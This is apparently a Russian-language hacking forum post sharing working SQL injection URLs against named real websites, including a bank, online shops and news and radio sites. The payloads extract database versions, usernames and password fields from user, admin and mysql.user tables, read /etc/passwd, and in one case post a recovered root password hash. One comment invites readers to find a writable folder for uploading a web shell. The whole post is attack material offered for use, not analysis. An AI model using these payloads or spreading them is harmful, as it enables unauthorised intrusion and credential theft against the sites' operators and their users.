Code: http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,convert(user_name+using+latin1),convert(user_pass+using+latin1)+from+users/*
Code: http://www.sims2club.ru/download/forhouse/details?id=-5150+union+select+1,2,3,4,5,6,7,8/* вот немножко в другом месте
Code: http://www.build.kz/index.php?page=inc/firm&subcid=9&cid=102&fid=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
Code: http://www.sunset-shop.net/boutique/achat/index.php?id=-37+union+select+1,version()/* Code: http://www.ergopix.com/c3/shop/achat/index.php?id=-22+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4/*
Юзера не подобрал: Code: http://stopusa.be/scripts/texte.php?section=&langue=3&id=-25094+union+select+1,2,passwd,4,5,6,7,8,9,10+from+users/*
Code: http://www.motocentr.com.ua/news_one.php?n=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/* http://www.motocentr.com.ua/news_one.php?n=-1+union+select+1,2,table_name,4,5+from+information_schema.tables/* Code: http://www.tourshow.ru/hotels/hdescr.php?hotel=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(database(),char(58),user(),char(58),version()),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
Code: http://pvl16.stitcher.ru/patterns/?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/* Code: http://www.zoo.volganin.net/ind.php?id_categ=-1+union+select+1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char),7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
Code: http://www.britfilms.tv/index.php?id=-5+union+select+version(),2/* Code: http://www.cloob.com/web/index.php?mode=cat&id=6&parent_id=-7+union+select+1,version(),3,4,5,6,7/*
shoping Code: http://www.oktava-shop.com/view_prod.php?id=-89+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13,14+from+admin/* Code: http://www.poker-shop.ch/produit_info.php?id=-8+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+29,1/* Code: http://www.poker-shop.ch/produit_info.php?id=-8+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16/*
Code: http://www.bukvite.com/poem.php?docid=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12/*
Code: http://metromir.ru/weather.php?cityid=1'+union+select+version()/* Полазьте поглубже, у кого есть время...
для начала: Code: http://metromir.ru/weather.php?cityid=1'+union+select+concat(user,0x3a,password)+from+mysql.user/* root:447a27ec3f4a0108
Code: http://autoonline.com.ua/news/index.php?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9/* http://autoonline.com.ua/news/index.php?id=-1+union+select+1,2,3,4,5,concat(firma,char(58),kname,char(58),tel,char(58),mail),7,8,9+from+mail+limit+0,1/* Code: http://www.informatics.ru/viewproblem.php?problem_id=101&round_id=-1+union+select+1,2,database(),version(),5,6,7,8,concat(user,char(58),password),10+from+mysql.user/*
хз выкладывал кто нет,полностью раздроченная скуля Code: http://www.kalinka.ru/reports/?show_photo=-52+union+select+1,2,3,4,5,6/* так же есть права на чтение и запись, но чтение осложнялось тем что вывод ограничен в несколько символов смотреть конфиги через substring например мой мозк просто не выдержал,поэтому был найден методом тыка путь /home/www/htdocs/ ,думаю папку для заливки шелла сами найдете юзайте на здоровье.
Code: http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,pw,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0x697427732061646d696e,24,25,26,27,user,29,30+from+users/* c помощью лимита можно крутить Code: http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,mysql.user.password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,0x4d7953514c2070617373,24,25,26,27,user,29,30+from+mysql.user/* пасс от базы(не разломал) Code: http://radio.localka.ru/jazz/songinfo.php?song_id=-264+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,0x2f6574632f706173737764,29,30/* /etc/passwd
